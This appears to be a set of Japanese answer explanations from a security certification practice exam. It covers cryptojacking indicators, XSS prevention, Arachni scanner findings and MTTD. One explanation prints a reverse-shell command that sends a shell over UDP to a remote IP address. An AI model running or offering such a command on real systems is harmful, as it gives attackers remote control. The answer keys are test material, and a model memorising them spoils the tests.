高い GPU 使用率は、暗号通貨のマイニングに関わる複雑な数学的問題を解決するために必要な集中的な計算作業を反映しているため、クリプトマイニングが発生している可能性が最も高い指標です。クリプトマイニングは、コンピューティング能力を使用してトランザクションを検証し、ブロックチェーン上に新しいブロックを作成することによって、暗号通貨の新しい単位を生成するプロセスです。クリプトマイニングは、マイニング プールに参加して報酬を共有する個人やグループによって合法的に行われることもあれば、マルウェアやスクリプトを使用して何も疑っていない被害者のコンピューティング リソースを乗っ取り、自分たちの利益のために使用する脅威アクターによって不法に行われることもあります。この行為はクリプトジャッキングと呼ばれ、影響を受けるシステムのパフォーマンスの低下、消費電力の増加、セキュリティ リスクを引き起こす可能性があります。GPU は並列処理に適しており、1 秒あたりより多くの計算を処理できるため、クリプトマイニングは通常、CPU (中央処理装置) ではなく GPU (グラフィックス処理装置) に依存します。したがって、高い GPU 使用率は、特にワークロードの増加について他に説明がない場合、システム上でクリプトマイニングが行われている兆候である可能性があります。他のオプションは、他の原因や説明が考えられるため、高い GPU 使用率ほどクリプトマイニングを示すものではありません。帯域幅の消費量は、ネットワーク トラフィック、ストリーミング サービス、ダウンロード、アップデートなどのさまざまな要因の影響を受ける可能性があります。これはクリプトマイニングとは直接関係がなく、マイニング プールやブロックチェーン ネットワークと通信するために多くの帯域幅を必要としません。不正な変更は、ランサムウェア、スパイウェア、トロイの木馬など、さまざまな種類のマルウェアまたはサイバー攻撃の結果である可能性があります。
これらはクリプトマイニングに特有のものではありません。クリプトマイニングは必ずしもシステム上のファイルや設定を変更するわけではなく、その処理能力を使用します。異常なトラフィックの急増は、正当な需要の急増、分散型サービス拒否攻撃、ボットネットなど、さまざまな要因によって引き起こされる場合もあります。これらは、システムとの間で大量のトラフィックやリクエストを生成しないクリプトマイニングを示すものではありません。

これは、クロスサイト スクリプティング (XSS) と呼ばれる Web アプリケーションの脆弱性の一種で、攻撃者が他のユーザーが閲覧する Web ページに悪意のあるコードを挿入することを可能にします。XSS は、Cookie、セッション トークン、資格情報、その他の機密情報を盗んだり、被害者に代わってアクションを実行したりするために使用できます。
入力サニタイズは、ユーザー入力を処理する前にチェックしてフィルタリングすることにより、XSS 攻撃を防止する技術です。入力サニタイズでは、ブラウザによってコードとして解釈される可能性のある文字や文字列 (<、>、"、'、javascript: など) を削除またはエンコードできます。入力サニタイズでは、事前定義された形式や値の範囲に対して入力を検証することもできます。一致しない入力は拒否されます。
出力エンコーディングは、出力をブラウザーに送信する前にエンコードすることで XSS 攻撃を防止する技術です。出力エンコーディングは、ブラウザによってコードとして解釈される可能性のある文字や文字列を、<、>、"、'、または javascript: などの無害なエンティティに変換できます。また、出力エンコーディングは、異なる意味を持つ可能性のある特殊文字をエスケープすることもできます。 、/、; などのさまざまなコンテキスト。
コード難読化は、Web アプリケーションのソース コードを人間が読んだり理解したりするのをより困難にする技術です。コードの難読化では、変数や関数の名前変更、コメントや空白の削除、リテラルの式への置き換え、ダミー コードの追加などの手法を使用できます。コードの難読化は、Web アプリケーションの知的財産や企業秘密の保護には役立ちますが、XSS 攻撃を防ぐことはできません。

リバース シェルは、通常の通信方向を逆にすることで、リモート ユーザーがターゲット システムまたはネットワーク上でコマンドを実行できるようにするシェル アクセスの一種です。リバース シェルは通常、リモート ユーザーのシステムに接続してシェル セッションを開く、ターゲット システム上で悪意のあるスクリプトまたはプログラムを実行することによって作成されます。リバース シェルは、ターゲット システムによって開始された発信接続を使用するため、着信接続をブロックするファイアウォールやその他のセキュリティ制御をバイパスできます。この場合、セキュリティ アナリストは次のコマンドを含むエクスプロイトの試みを検出しました。
sh -i >& /dev/udp/10.1.1.1/4821 0>$l
このコマンドは、UDP プロトコルを使用して、ターゲット システムから IP アドレス 10.1.1.1 およびポート 4821 のリモート ユーザーのシステムへのリバース シェル接続を作成するシェル スクリプトです。

この脆弱性の最も可能性の高い理由は B です。開発者がヘッダーに適切なクロスサイト スクリプティング保護を設定しませんでした。クロスサイト スクリプティング (XSS) は、Web アプリケーションの脆弱性の一種であり、攻撃者が他のユーザーが閲覧する Web ページに悪意のあるコードを挿入することを可能にします。XSS は、Cookie、セッション トークン、認証情報、その他の機密情報を盗んだり、被害者に代わってアクションを実行したりするために使用できます1。
XSS 攻撃を防ぐ一般的な方法の 1 つは、Web ページのコンテンツの処理方法をブラウザーに指示する適切な HTTP 応答ヘッダーを設定することです。たとえば、Content-Type ヘッダーでは、Web ページの MIME タイプと文字エンコーディングを指定できます。これにより、ブラウザーがデータをコードとして解釈することを回避できます。X-XSS-Protection ヘッダーは、ブラウザーの組み込み XSS フィルターを有効または無効にすることができ、疑わしいスクリプトをブロックまたはサニタイズできます。Content-Security-Policy ヘッダーでは、Web ページ上でどのリソースやスクリプトをロードまたは実行できるかを制御するソースとディレクティブのホワイトリストを定義できます2。
Web アプリケーション セキュリティ スキャナ フレームワーク 3 である Arachni の出力によると、アクション https://localhost/search.aspx によるフォーム入力「txtSearch」に XSS 脆弱性が検出されました。これは、Arachni が悪意のあるスクリプトを入力フィールドに挿入し、応答でその実行を観察できたことを意味します。これは、開発者が search.aspx のヘッダーに適切なクロスサイト スクリプティング保護を設定していないことを示しており、これにより、Arachni がブラウザのデフォルトのセキュリティ メカニズムをバイパスし、Web ページ上で任意のコードを実行することができました。

平均検出時間 (MTTD) は、SIEM、SOAR、チケット発行システムへの最近の投資を考慮すると、組織が重点を置く最適な指標です。MTTD は、セキュリティ インシデントまたは脅威が発生してから検出するまでにかかる時間を測定する指標です。MTTD は、さまざまなソースからセキュリティ データを収集、関連付け、分析、警告できるツールとプロセスを使用することで改善できます。SIEM、SOAR、およびチケット発行システムは、MTTD を削減し、セキュリティ運用を強化するのに役立つツールとプロセスの例です。公式リファレンス: https://www.eccouncil.org/cybersecurity-exchange/threat-intelligence/cyber-kill-chain-seven-steps-cyber攻撃